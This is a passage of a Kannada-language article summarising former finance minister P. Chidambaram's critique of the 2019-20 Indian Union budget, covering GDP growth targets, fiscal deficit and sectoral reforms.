ಕೇಂದ್ರ ಸರ್ಕಾರದ ಬಜೆಟ್ ಪಿ.ಚಿದಂಬರಂ ವಿಶ್ಲೇಷಣೆ

ಹಿರಿಯ ರಾಜಕಾರಣಿ, ಮಾಜಿ ವಿತ್ತಮಂತ್ರಿ ಪಿ.ಚಿದಂಬರಂ ಅವರು ಪ್ರಸ್ತುತ ಕೇಂದ್ರ ಸರ್ಕಾರದ ಹಣಕಾಸು ಸಚಿವೆ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಅವರು ಮಂಡಿಸಿರುವ 2019-2020ನೆಯ ಸಾಲಿನ ಬಜೆಟ್ಟಿನ ಇತಿಮಿತಿಗಳನ್ನು ನ್ಯೂ ಇಂಡಿಯನ್ ಎಕ್ಸ್ ಪ್ರೆಸ್‍ನಲ್ಲಿ ಪ್ರಕಟಿಸಿರುವ ತಮ್ಮ ಎರಡು ಲೇಖನಗಳಲ್ಲಿ ಚರ್ಚೆ ಮಾಡಿದ್ದಾರೆ. ಅನೇಕ ಬಜೆಟ್ಟುಗಳನ್ನು ಮಂಡಿಸಿ ಹಣಕಾಸು ಸಚಿವಾಲಯವನ್ನು ಅನೇಕ ವರ್ಷಗಳ ಕಾಲ ನಿರ್ವಹಿಸಿ ಅನುಭವವಿರುವ ಪಿ.ಚಿದಂಬರಂ ಅವರು ಬಜೆಟ್ ಬಗ್ಗೆ ಅರ್ಥಪೂರ್ಣ ಟೀಕೆಗಳನ್ನು ಮಾಡಲು ಮತ್ತು ಕೊರತೆಗಳನ್ನು ಗುರುತಿಸಲು ಸಮರ್ಥರು. ಹಾಗಾಗಿ ನಮ್ಮ ಓದುಗರ ತಿಳಿವಳಿಕೆಗೆ ನೆರವಾಗಲೆಂದು ಚಿದಂಬರಂ ಅವರ ಲೇಖನಗಳ ಸಾರವನ್ನು ಇಲ್ಲಿ ನಿರೂಪಿಸಲಾಗಿದೆ.

 

ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯಲ್ಲಿನ ಗುರಿಗಳು ಮತ್ತು ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಬಜೆಟ್ಟು!

ಪ್ರಸ್ತುತ ಕೇಂದ್ರದ ಮೋದಿ-2.0 ಸರ್ಕಾರವು ಹಂತಹಂತವಾಗಿ ಬಡ್ತಿ ರೂಪದಲ್ಲಿ ಆರ್ಥಿಕ ಸುಧಾರಣೆಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳುವ ಕ್ರಮವನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡಿದೆ. ಭಾರತದ ಆರ್ಥಿಕತೆಯ ಬೆಳವಣಿಗೆಯನ್ನು ತೀವ್ರಗೊಳಿಸುವುದಕ್ಕೆ ಅಗತ್ಯವಾದ ಕ್ರಮಗಳ ಬಗ್ಗೆ ಕಳೆದ ವರ್ಷ ವಿಶೇಷ ಸಂಪುಟದಲ್ಲಿ ಕಾರ್ಯತಂತ್ರ ನೀಡಿರುವ 13 ಅಂತಾರಾಷ್ಟ್ರೀಯ ಖ್ಯಾತಿಯ ಭಾರತೀಯ ಮತ್ತು ಭಾರತೀಯ ಮೂಲದ ವಿದೇಶಿ ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞರಿಗೆ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಅವರ ಬಜೆಟ್ಟಿನ ಕ್ರಮಗಳಿಂದ ನಿರಾಶೆಯುಂಟಾಗಿರಬೇಕು. ಅದೇ ರೀತಿಯಲ್ಲಿ ಆಮೂಲಾಗ್ರ ಸುಧಾರಣೆಗಳ ಬಗ್ಗೆ ನಿರೀಕ್ಷೆಯಿಟ್ಟುಕೊಂಡಿದ್ದವರಿಗೂ ಸದರಿ ಬಜೆಟ್ಟಿನಿಂದ ಆಶಾಭಂಗವಾಗಿರಲು ಸಾಕು.

ಐದು ವರ್ಷಗಳ ಹಿಂದೆ ಮುಖ್ಯ ಆರ್ಥಿಕ ಸಲಹೆಗಾರರಾಗಿದ್ದ ಡಾ.ಅರವಿಂದ ಸುಬ್ರಮಣಿಯನ್ ಅವರು ತಾವು ರೂಪಿಸಿದ್ದ 2014-15ರ ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯಲ್ಲಿ ‘ದೇಶಗಳ ಚರಿತ್ರೆಯಲ್ಲಿ ಅಪರೂಪವೆನ್ನಬಹುದಾದ ಒಂದು ಸ್ವೀಟ್ ಸ್ಪಾಟನಲ್ಲಿ ಭಾರತೀಯ ಆರ್ಥಿಕತೆಯು ನೆಲೆಗೊಂಡಿದೆ. ಇಲ್ಲ್ಲಿಂದ ಅದು ಅಂತಿಮವಾಗಿ ಎರಡಂಕಿ ಬೆಳವಣಿಗೆ ಕಾರ್ಯತಂತ್ರವನ್ನು ಮಧ್ಯಮಾವಧಿ ಯೋಜನೆಯಾಗಿ ಆರಂಭಿಸಬಹುದು’ ಎಂದು ಬರೆದಿದ್ದರು. ಈ ಆಶ್ವಾಸನೆಯನ್ನು ಈಡೇರಿಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ಮೋದಿ- 1.0 ಸರ್ಕಾರ ವಿಫಲವಾಗಿದೆ ಎನ್ನುವುದನ್ನು ಘೋಷಿಸಲು ಅವರು ಮೋದಿ-1.0 ಸರ್ಕಾರದ ಅವಧಿ ಮುಗಿಯುವವರೆಗೆ ವೃತ್ತಿಯಲ್ಲಿ ಮುಂದುವರಿಯಲಿಲ್ಲ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯು ಎರಡಂಕಿ ಬೆಳವಣಿಗೆಯನ್ನು ಸಾಧಿಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ವಿಫಲವಾಗಿ ಕಳೆದ ಐದು ವರ್ಷಗಳಲ್ಲಿನ ಸರಾಸರಿ ಬೆಳವಣಿಗೆ ಪ್ರಮಾಣ ಶೇ. 7.5 ರಷ್ಟಿತ್ತು ಎಂಬುದನ್ನು ಘೋಷಿಸುವ ದುರದೃಷ್ಟ ಹೊಣೆಗಾರಿಕೆ ಅವರ ನಂತರ ಅಧಿಕಾರ ಸ್ವೀಕರಿಸಿರುವ ಡಾ.ಕೃಷ್ಣಮೂರ್ತಿ ಸುಬ್ರಮಣಿಯನ್ ಅವರ ಪಾಲಾಯಿತು.

ಆರ್ಥಿಕತೆಯ ವಾರ್ಷಿಕ ಶೇ. 7.5 ಬೆಳವಣಿಗೆಯು ತೃಪ್ತಿಕರವಾದುದಾಗಿದೆ. ಆದರೆ ಎರಡಂಕಿ ಗುರಿಯ ಹತ್ತಿರ ಹೋಗುವುದು ಆರ್ಥಿಕತೆಗೆ ಸಾಧ್ಯವಾಗಲಿಲ್ಲ. ಇದಲ್ಲದೆ ಕಳೆದ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಸಾಧಿಸಿರುವ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ ಪ್ರಮಾಣ ಕ್ರಮವಾಗಿ ಶೇ.7.4, ಶೇ.8.0. ಶೇ.8.2, ಶೇ.7.2 ಮತ್ತು ಶೇ. 6.8. ಮೋದಿ-1.0 ರ ಮೊದಲ ಮೂರು ವರ್ಷಗಳ ಅವಧಿಯಲ್ಲಿ ಜಿಡಿಪಿಯು ಶೇ.7.4 ರಿಂದ ಶೇ.8.2 ಕ್ಕೇರಿದ್ದು ಡಾ.ಅರವಿಂದ್ ಅವರಿಗೆ ಸಮಾಧಾನ ತಂದಿರಲು ಸಾಕು. ಆದರೆ ನನ್ನ ಅನುಮಾನವೆಂದರೆ ನವೆಂಬರ್ 2016ರ ಅಮಾನ್ಯೀಕರಣ ಕ್ರಮದಿಂದ ಅವರ ಕನಸು ನುಚ್ಚು ನೂರಾಗಿರಬೇಕು. ಅಲ್ಲಿಂದ ಮುಂದೆ ಬೆಳವಣಿಗೆ ಪ್ರಮಾಣವು ಶೇ.8.2 ರಿಂದ ಶೇ.7.2ಕ್ಕೆ ಮತ್ತು ನಂತರ ಶೇ. 6.8ಕ್ಕೆ ಕುಸಿದಿದೆ.

ಸರ್ಕಾರದ ಹಣಕಾಸು ನೀತಿ ಮಂಡಳಿಯು ರಿಸರ್ವ್ ಬ್ಯಾಂಕಿಗೆ ನಿಗದಿಪಡಿಸಿಕೊಟ್ಟಿರುವ ಶೇ.4ರ ಹಣದುಬ್ಬರ ಗುರಿಯ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಐದು ಟ್ರಿಲಿಯನ್ ಡಾಲರ್ ಜಿಡಿಪಿ ಸಾಧಿಸಿಕೊಳ್ಳಲು ಅದರ ಬೆಳವಣಿಗೆಯು ವಾರ್ಷಿಕ ಶೇ.8 ರಷ್ಟಾಗಬೇಕಾಗುತ್ತದೆ’ ಎಂದು ಬರೆದಿದ್ದಾರೆ.

ಮೋದಿ-2.0 ಸರ್ಕಾರವು ಅಧಿಕಾರ ವಹಿಸಿಕೊಂಡಿರುವ ಪ್ರಸ್ತುತ ಸಂದರ್ಭದಲ್ಲಿ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ ಇನ್ನು ಹೆಚ್ಚು ಕುಸಿತಕ್ಕೆ ಒಳಗಾಗಿದೆ. ನಮ್ಮ ದೇಶದ 2018-19ರ ಜಿಡಿಪಿಯ ತ್ರೈಮಾಸಿಕವಾರು ಬೆಳವಣಿಗೆ ಕ್ರಮವಾಗಿ ಶೇ.8.0, ಶೇ.7.0, ಶೇ.6.6 ಮತ್ತು ಶೇ.5.8. ಈ ತೀವ್ರ ಬಿಕ್ಕಟ್ಟಿನ ಕಾಲದಲ್ಲಿ ಹೊಸದಾಗಿ ನೇಮಕಗೊಂಡಿರುವ ಮುಖ್ಯ ಆರ್ಥಿಕ ಸಲಹೆಗಾರ ಮೋದಿ-2.0 ಸರ್ಕಾರದ ಬೆಳವಣಿಗೆ ಗುರಿಗಳ ಬಗ್ಗೆ ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯಲ್ಲಿ ‘ಭಾರತದ ಜಿಡಿಪಿಯು 2024-25ರಲ್ಲಿ ಐದು ಟ್ರಲಿಯನ್ ಡಾಲರಾಗಬೇಕೆಂಬ ಗುರಿಯಿಟ್ಟಿಕೊಳ್ಳಲಾಗಿದೆ (ಐದು ಟ್ರಿಲಿಯನ್ ಎಂಬುದು ಪ್ರತಿ ಡಾಲರಿಗೆ ರೂ. 70ರ ದರದಲ್ಲಿ ರೂ. 350 ಲಕ್ಷ ಕೋಟಿಯಾಗುತ್ತದೆ. -ಲೇಖಕ). ಈ ಸಾಧನೆಯಿಂದಾಗಿ ಭಾರತದ್ದು ಜಗತ್ತ್ತಿನ ಮೂರನೆಯ ಬೃಹತ್ ಆರ್ಥಿಕತೆಯಾಗುತ್ತದೆ. ಸರ್ಕಾರದ ಹಣಕಾಸು ನೀತಿ ಮಂಡಳಿಯು ರಿಸರ್ವ್ ಬ್ಯಾಂಕಿಗೆ ನಿಗದಿಪಡಿಸಿಕೊಟ್ಟಿರುವ ಶೇ.4ರ ಹಣದುಬ್ಬರ ಗುರಿಯ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಐದು ಟ್ರಿಲಿಯನ್ ಡಾಲರ್ ಜಿಡಿಪಿ ಸಾಧಿಸಿಕೊಳ್ಳಲು ಅದರ ಬೆಳವಣಿಗೆಯು ವಾರ್ಷಿಕ ಶೇ.8 ರಷ್ಟಾಗಬೇಕಾಗುತ್ತದೆ’ ಎಂದು ಬರೆದಿದ್ದಾರೆ.

ಪಿ.ಚಿದಂಬರಂ ಪ್ರಕಾರ ಇದೊಂದು ಯೋಗ್ಯ ಗುರಿ. ಈಗ ನಮ್ಮ ಮುಂದಿರುವ ಪ್ರಶ್ನೆ: ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯು ನಿಗದಿಪಡಿಸಿರುವ ಗುರಿಯನ್ನು ಸಾಧಿಸಿಕೊಳ್ಳಲು ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಅವರ ಬೊಚ್ಚಲ ಬಜೆಟ್ಟಿನ ಕಾಣಿಕೆಯೇನು, ಕಾರ್ಯತಂತ್ರವೇನು? ನಾವೆಲ್ಲರೂ ಸದರಿ ಬಜೆಟ್ಟಿನ ಬಗ್ಗೆ ನಮ್ಮದೇ ನಿರೀಕ್ಷ್ಷೆಗಳ ನೆಲೆಯಲ್ಲಿ ಕೇಳಬೇಕಾದ ಪ್ರಶ್ನೆ: ಈ ನಿರೀಕ್ಷೆಗಳಲ್ಲಿ ನಮ್ಮ ವಿತ್ತಮಂತ್ರಿಗಳ ಬಜೆಟ್ಟಿನ ಕ್ರಮಗಳು ಯಾವ ಯಾವುದರಲ್ಲಿ ಪಾಸಾಗುತ್ತವೆ ಮತ್ತು ಯಾವ ಯಾವುದರಲ್ಲಿ ನಪಾಸಾಗುತ್ತವೆ?

ಈ ನಿರೀಕ್ಷೆಗಳನ್ನು ಚಿದಂಬರಂ ಅವರು ಜಾಗತಿಕ ಮಹತ್ವದ ಭಾರತೀಯ ಮತ್ತು ಭಾರತೀಯ ಮೂಲದ 13 ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞರು 2019ರಲ್ಲಿ ಪ್ರಕಟಿಸಿರುವ ‘ಈಗ ಭಾರತೀಯ ಆರ್ಥಿಕತೆಗೆ ಅಗತ್ಯವಾಗಿರುವುದೇನು’ ಎಂಬ ಶೀರ್ಷಿಕೆಯ 14 ಪ್ರಬಂಧಗಳ ಸಂಪುಟದಲ್ಲಿ ಗುರುತಿಸಿರುವ ನಿರೀಕ್ಷೆಗಳ ಚೌಕಟ್ಟಿನಲ್ಲಿ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಬಜೆಟ್ಟು ಎಷ್ಟು ನಿರೀಕ್ಷೆಗಳನ್ನು ಈಡೇರಿಸಬಲ್ಲದು ಎಂಬುದರ ಬಗ್ಗೆ ಚರ್ಚೆ ಮಾಡಿದ್ದಾರೆ. ಈ ಮೌಲ್ಯಮಾಪನಕ್ಕೆ ಅವರು ಸದರಿ ಸಂಪುಟದ ಆಯ್ದ ನಿರೀಕ್ಷೆಗಳನ್ನು ಬಜೆಟ್ಟಿನ ಕ್ರಮಗಳೆದುರಿಗಿಟ್ಟು ಚರ್ಚೆ ಮಾಡಿದ್ದಾರೆ. ಈ ಕೃತಿಗೆ ‘ಭಾರತವು ಎದುರಿಸುತ್ತಿರುವ ಎಂಟು ಸವಾಲುಗಳು’ ಎಂಬ ಶೀರ್ಷಿಕೆಯ ಹಿನ್ನುಡಿ ಬರೆದಿರುವ ಡಾ.ಅಭಿಜಿತ್ ಬ್ಯಾನರ್ಜಿ ಮತ್ತು ರಘುರಾಮ್ ರಾಜನ್ ಅವರು ಅನೇಕ ವಿಚಾರಗಳನ್ನು ಇಲ್ಲಿ ಮಂಡಿಸಿದ್ದಾರೆ (ಈ ಕೃತಿಯ ಸಂಕ್ಷಿಪ್ತ ಸಾರಕ್ಕೆ ನೋಡಿ: ಸಮಾಜಮುಖಿ, ಜುಲೈ 2019). ಇವರು ಪಟ್ಟಿ ಮಾಡಿರುವ ಸವಾಲುಗಳು ನಮ್ಮ ಆರ್ಥಿಕತೆಗೆ ಒಂದಲ್ಲ ಒಂದು ರೀತಿಯಲ್ಲಿ ಅನ್ವಯವಾಗುತ್ತವೆ. ಈ ಪಟ್ಟಿಯಲ್ಲಿನ ಐದು ಸವಾಲುಗಳನ್ನು ಆಯ್ದುಕೊಂಡು ಚಿದಂಬರಂ ಅವರು ಬಜೆಟ್ಟಿನಲ್ಲಿ ಸದರಿ ಸವಾಲುಗಳಿಗೆ ಎಷ್ಟರಮಟ್ಟಿಗೆ ಪರಿಹಾರ ನೀಡಿದೆ ಎಂಬುದನ್ನು ಪರೀಕ್ಷೆಗೆ ಒಳಪಡಿಸಿದ್ದಾರೆ. ಈ ಐದು ಸವಾಲುಗಳಲ್ಲಿ ಎಷ್ಟರಲ್ಲಿ ನಿರ್ಮಲಾ ಸೀತಾರಾಮ್ ತೇರ್ಗಡೆಯಾಗಿದ್ದಾರೆ ಮತ್ತು ಉನುತ್ತೀರ್ಣರಾಗಿದ್ದರೆ ಎಂಬುದನ್ನು ಚರ್ಚಿಸಿದ್ದಾರೆ.

ವಿತ್ತೀಯ ಕೊರತೆಯ ನಿಯಂತ್ರಣ: ಚಿದಂಬರಮ್ ಪ್ರಕಾರ ಇದರಲ್ಲಿ ಮೋದಿ-1.0 ರ ಸಾಧನೆ ನಿರಾಶಾದಾಯಕವಾಗಿದೆ. ಈ ಅವಧಿಯಲ್ಲಿ ವಿತ್ತೀಯ ಕೊರತೆಯನ್ನು ಶೇ. 4.5 ರಿಂದ ಶೇ. 3.4 ಕ್ಕಿಳಿಸಲಾಗಿದೆ. ಅವರ ಪ್ರಕಾರ 2018-19ರಲ್ಲಿ ತೀವ್ರ ರೆವಿನ್ಯೂ ಸಂಗ್ರಹದಲ್ಲಿನ ವೈಫಲ್ಯದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಸದರಿ ಸಾಲಿನ ಬಜೆಟ್ಟಿನಲ್ಲಿ ವಿತ್ತೀಯ ಕೊರತೆ ಬಗ್ಗೆ ನೀಡಿರುವ ಅಂಕಿಗಳು ಸಂಶಯ ಮೂಡಿಸುತ್ತವೆ. ಆದ್ದರಿಂದ ಚಿದಂಬರಮ್ ಪ್ರಕಾರ 2019-20ರ ವಿತ್ತೀಯ ಕೊರತೆ ಅಂಕಿಗಳ ಬಗ್ಗೆಯೂ ಸಹ ಅನುಮಾನ ಸಾಧ್ಯ.

ಒತ್ತಡದ ಬಿಕ್ಕಟ್ಟಿಗೆ ಸಿಲುಕಿರುವ ವಲಯಗಳು (ಕೃಷಿ, ಇಂಧನ ಮತ್ತು ಬ್ಯಾಂಕಿಂಗ್): ಬಜೆಟ್ ಭಾಷಣದಲ್ಲಿ ಕೃಷಿಯು ಎದುರಿಸುತ್ತಿರುವ ಬಿಕ್ಕಟ್ಟಿಗೆ ಯಾವುದೇ ಪರಿಹಾರದ ಸೂಚನೆಗಳಿಲ್ಲ. ಇಂಧನದ ಬಗ್ಗೆ ಜಾರಿಯಲ್ಲಿರುವ ಯೋಜನೆಗಳ ಬಗ್ಗೆ ಮಾತ್ರ ಚರ್ಚೆ ಮಾಡಲಾಗಿದೆ. ಬಿಕ್ಕಟ್ಟಿನಲ್ಲಿ ಉಸಿರುಕಟ್ಟಿ ನರಳುತ್ತಿರುವ ಬ್ಯಾಂಕಿಂಗ್ ವಲಯದಲ್ಲಿನ ಸಾರ್ವಜನಿಕ ಬ್ಯಾಂಕುಗಳಿಗೆ ರೂ. 70,000 ಕೋಟಿ ‘ಮರುಬಂಡವಾಳ’ ಒದಗಿಸುವ ಭರವಸೆ ನಿಡಲಾಗಿದೆ. ಚಿದಂಬರಂ ಪ್ರಕಾರ ಈ ಮೊತ್ತ ಅತ್ಯಲ್ಪ.

ಉತ್ತಮ ವ್ಯಾಪಾರ ವಾತಾವರಣ: ಸದರಿ ಕೃತಿಯಲ್ಲಿನ ಒಂದು ಕೋಷ್ಟಕದಲ್ಲಿ ವ್ಯಾಪಾರದ ವಾತಾವರಣವನ್ನು ಉತ್ತಮಪಡಿಸಲು ಅನೇಕ ಸಲಹೆಗಳಿವೆ. ವ್ಯಾಪಾರವನ್ನು ವ್ಯಾಪಾರದಂತೆ ರೂಢಿಗತ ಕ್ರಮದಲ್ಲಿ ಮಾಡುತ್ತಾ ನಡೆದರೆ ಅದರಿಂದ ವ್ಯಾಪಾರಿ ವಾತಾವರಣ ಹೇಗೆ ಉತ್ತಮವಾಗುತ್ತದೆ? ಎಂಬುದು ಚಿದಂಬರಂ ಪ್ರಶ್ನೆ. ವಿಶೇಷ ಆರ್ಥಿಕ ವಲಯಗಳು ರಫ್ತು ವ್ಯಾಪಾರಕ್ಕೆ ಒತ್ತು ನೀಡುತ್ತಿಲ್ಲ. ಕಾರ್ಮಿಕ ಕಾನೂನುಗಳ ಬಗ್ಗೆ ಕೇವಲ ಸಂಹಿತೆ ಮಾಡಲಾಗುತ್ತಿದೆ. ಮೂರು ವರ್ಷಗಳ ಕಾಲ ಪರವಾನಗಿ ಅಥವಾ ಅನುಮತಿಯಿಲ್ಲದೆ ಸ್ಟಾರ್ಟ್‍ಅಪ್‍ಗಳು ನಡೆಯುವಂತಹದ್ದು ಮುಂತಾದವುಗಳ ಬಗ್ಗೆ ಬಜೆಟ್ ಗಮನ ನೀಡಿಲ್ಲ.

ನಿಯಂತ್ರಣ ಕ್ರಮಗಳನ್ನು ಸಡಿಲಗೊಳಿಸುವುದು: ಇದಕ್ಕೆ ಅತುತ್ತಮ ಪರಿಹಾರವೆಂದರೆ ಬೃಹತ್ ರೂಪದಲ್ಲಿ ವಿಕೇಂದ್ರೀಕರಣ. ಮೊದಲನೆಯದಾಗಿ ಶಾಲಾ ಶಿಕ್ಷಣವನ್ನು ರಾಜ್ಯಗಳಿಗೆ ವಹಿಸಿಕೊಡಬೇಕು (ಇದೊಂದು ಪಿ.ಚಿದಂಬರಂ ಅವರ ಅತ್ಯತ್ತಮ ಸಲಹೆ: -ಲೇಖಕ). ಇದೇ ರೀತಿಯಲ್ಲಿ ಸಂವಿಧಾನದಲ್ಲಿ ಸಂಯುಕ್ತ ಪಟ್ಟಿಯಲ್ಲಿರುವ ಅನೇಕ ಜವಾಬ್ದಾರಿಗಳನ್ನು ರಾಜ್ಯಪಟ್ಟಿಗೆ ವರ್ಗಾಯಿಸಬಹುದು. ಇದಕ್ಕೆ ಪ್ರತಿಯಾಗಿ ವಿತ್ತಮಂತ್ರಿಗಳು ಶಾಲಾ-ಕಾಲೇಜು ಶಿಕ್ಷಣದಲ್ಲಿ ಕೇಂದ್ರ ಸರ್ಕಾರಕ್ಕೆ ಹೆಚ್ಚಿನ ಜವಾಬ್ದಾರಿ ನೀಡಿದ್ದಾರೆ. ಆರ್‍ಬಿಐ, ಸಿಬಿಡಿಟಿ, ಸಿಬಿಐಸಿ, ಕಾಂಪಿಟಿಶನ್ ಕಮೀಷನ್ ಆಫ್ ಇಂಡಿಯಾ ಮುಂತಾದವುಗಳನ್ನು ‘ನಿಯಂತ್ರಕ’ ಸಂಸ್ಥೆಗಳನ್ನಾಗಿ ಮಾಡಲಾಗಿದೆ. ಈ ಸನ್ನಿವೇಶದಲ್ಲಿ ನಿಯಂತ್ರಣಗಳು ಸಡಿಲಗೊಳ್ಳುವುದಕ್ಕೆ ಪ್ರತಿಯಾಗಿ ಗಡುಸಾಗುತ್ತಿವೆ.

ಹೆಚ್ಚು ನಗದು ವರ್ಗಾವಣೆ: ಚಿದಂಬರಂ ಪ್ರಕಾರ ಇದಕ್ಕೆ ಬಜೆಟ್ಟಿನಲ್ಲಿ ಹೆಚ್ಚು ಅವಕಾಶಗಳನ್ನು ನೀಡಲಾಗಿದೆ. ಆದರೆ ಇದರಲ್ಲಿ ಹೊಸದೇನು ಇಲ್ಲ. ಏಕೆಂದರೆ ನೇರ ಅನುಕೂಲಗಳ ವರ್ಗಾವಣೆ(ಡಿಬಿಟಿ) ಕಾರ್ಯತಂತ್ರವು ಏಳು ವರ್ಷ ಹಳೆಯದು.

ಮೇಲಿನ ಐದು ಆಯ್ದ ಕ್ರಮಗಳಲ್ಲಿ ವಿತ್ತ ಮಂತ್ರಿಗಳು ಕೊನೆಯ ಒಂದರಲ್ಲಿ ಮಾತ್ರ ತೇರ್ಗಡೆಯಾಗಿದ್ದು ಉಳಿದ ನಾಲ್ಕರಲ್ಲಿ ಅವರು ಅನುತ್ತೀರ್ಣರಾಗಿದ್ದಾರೆ. ಇಂದು 1991-1996ರ ಅವಧಿಯಲ್ಲಿ ಜಾರಿಗೊಳಿಸಿದಂತಹ ಆಮೂಲಾಗ್ರ ಸುಧಾರಣೆಗಳ ಅಗತ್ಯವಿದೆ. ಇಂತಹ ಸುಧಾರಣೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸುವುದಕ್ಕೆ ಅಗತ್ಯವಾದ ಜನಾದೇಶ ಸರ್ಕಾರಕ್ಕಿದೆ. ಆದರೆ ಸರ್ಕಾರ ಹಂತಹಂತವಾಗಿ ಬಡ್ತಿ ರೂಪದಲ್ಲಿ ಸುಧಾರಣೆಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳುವ ನೀತಿಯನ್ನು ಅನುಸರಿಸುತ್ತಿದೆ.

ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ ಶೇ.7 ಎಂದರೆ… 

ಸಂಪತ್ತ್ತಾಭಿವೃದ್ಧಿಗೆ ಮತ್ತು ಜನರ ಸುಖಸಮೃದ್ಧಿಯನ್ನು ಸಾಧಿಸಿಕೊಳ್ಳಲು ಶೇ.7ರ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ ಏತಕ್ಕೂ ಸಾಕಾಗುವುದಿಲ್ಲ. ಲಕ್ಷ್ಷಾಂತರ ಉದ್ಯೋಗಗಳನ್ನು ಶೇ.7ರ ಬೆಳವಣಿಗೆ ಮೂಲಕ ಸೃಷ್ಟಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಸಮಾಜದಲ್ಲಿ ಕೆಳಸ್ತರದಲ್ಲಿರುವ ಶೇ.20ರಷ್ಟು ಜನರ ತಲಾ ವರಮಾನವನ್ನು ಶೇ.7ರ ಬೆಳವಣಿಗೆ ಮೂಲಕ ಹೆಚ್ಚಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಕೇಂದ್ರ ಸರ್ಕಾರದ ಬಜೆಟ್ಟುಗಳ ಚರಿತ್ರೆಯಲ್ಲಿ 2019-20ರ ಬಜೆಟ್ಟು ಒಂದು ಸಾಮಾನ್ಯ ಬಜೆಟ್ಟಾಗಿ ಮಾತ್ರ ಕಾಣುತ್ತದೆ. ಅದರಲ್ಲಿನ ಸಲಹೆ-ಕಾರ್ಯಕ್ರಮಗಳ ಬಗ್ಗೆ ಸಮಾಜದಲ್ಲಿ ಚರ್ಚೆ-ಸಂವಾದ ನಡೆಯುತ್ತಿಲ್ಲ. ಭಾರಿ ಶ್ರೀಮಂತರಿಗೆ(6467) ಬಜೆಟ್ಟಿನಿಂದ ಕಹಿ ಅನುಭವವಾಗಿದೆ. ಆದರೆ ಭಯದಿಂದಾಗಿ ಅವರು ಮೌನಕ್ಕೆ ಶರಣಾಗಿದ್ದಾರೆ. ಶ್ರೀಮಂತರಿಗೆ ಸಲೀಸಾಗಿ ಉಸಿರಡುವಂತಾಗಿದೆ. ಏಕೆಂದರೆ ಅವರಿಗೆ ರಿಯಾಯಿತಿ ದೊರೆಕಿದೆ. ಮಧ್ಯಮವರ್ಗಕ್ಕೆ ಭ್ರಮನಿರಶನವಾಗಿದೆ. ಏಕೆಂದರೆ ಹೊಸ ಹೊಸ ಭಾರವನ್ನು ಅವರ ಮೇಲೆ ಹೇರಲಾಗಿದೆ. ಬಡವರು ವಿಧಿಯ ಮೊರೆ ಹೋಗಬೇಕಾದ ಪ್ರಮೇಯ ಉಂಟಾಗಿದೆ. ಮಧ್ಯಮಗಾತ್ರದ ಕಾರ್ಪೋರೇಟುಗಳು(4000) ಮುಂದೆಸೆದ ಮಾಂಸದ ತುಂಡಿಗೆ ಬಾಯಬಾಯಿ ಬಿಡುತ್ತಿವೆ.

ಇಂದು ಬಜೆಟ್ಟಿನ ಬಗ್ಗೆ ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞರು ಮತ್ತು ಸಂಪಾದಕೀಯ ಬರೆಯುವ ಪತ್ರಕರ್ತರು ಚರ್ಚೆ ಮಾಡುತ್ತಿದ್ದಾರೆ. ಈ ಎರಡು ವರ್ಗಗಳನ್ನು ಅಸೂಯೆಯಿಂದ ಕೇಂದ್ರ ಸರ್ಕಾರ ನಿರ್ಲಕ್ಷಿಸುತ್ತಿದೆ (ವಿತ್ತ ಮಂತ್ರಿಯು ಹಣಕಾಸು ಸಚಿವಾಲಯಕ್ಕೆ ಪೂರ್ವಾನುಮತಿಯಿಲ್ಲದೆ ಪತ್ರಕರ್ತರು ಪ್ರವೇಶಿಸುವುದನ್ನು ನಿಷೇಧಿಸಿದ್ದಾರೆ).

ಯಾವ ಯಂತ್ರ ಚಾಲನೆಯಲ್ಲಿದೆ?

ಮೋದಿ-2.0 ಸರ್ಕಾರವು 2019-2020ರಲ್ಲಿ ಶೇ.7 ಅಥವಾ ಶೇ.8 ರ ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆ ಸಾಧಿಸುವುದಾಗಿ ಆಶ್ವಾಸನೆ ನೀಡಿದೆ. ಇದು ಕೇವಲ ಶೇ. 1 ರ ವ್ಯತ್ಯಾಸ ಮಾತ್ರವಲ್ಲ. ಇದು ಇಂದು ನಡೆಯುತ್ತಿರುವ ಮಂದಗತಿ ಬೆಳವಣಿಗೆ ಮತ್ತು ಸಂಭಾವ್ಯ ವೇಗವರ್ಧಕ ಬೆಳವಣಿಗೆಗಳ ನಡುವಿನ ವ್ಯತ್ಯಾಸವಾಗಿದೆ. ಇದು ಮುಖ್ಯ ಆರ್ಥಿಕ ಸಲಹೆಗಾರರ ಸುಪರ್ದಿಯಲ್ಲಿರುವ ಆರ್ಥಿಕ ವಿಭಾಗ ಮತ್ತು ವಿತ್ತ ಮಂತ್ರಿಯ ಸುಪರ್ದಿಯಲ್ಲಿರುವ ಬಜೆಟ್ ವಿಭಾಗಗಳ ನಡುವೆ ಚರ್ಚೆ-ಸಂವಾದ ಇಲ್ಲದಿರುವುದರ ಸೂಚಿಯೂ ಆಗಿದೆ. ಬಹುಪಾಲು ಬಜೆಟ್ ವಿಶ್ಲೇಷಣೆಗಾರರು ಗುರುತಿಸಿರುವಂತೆ 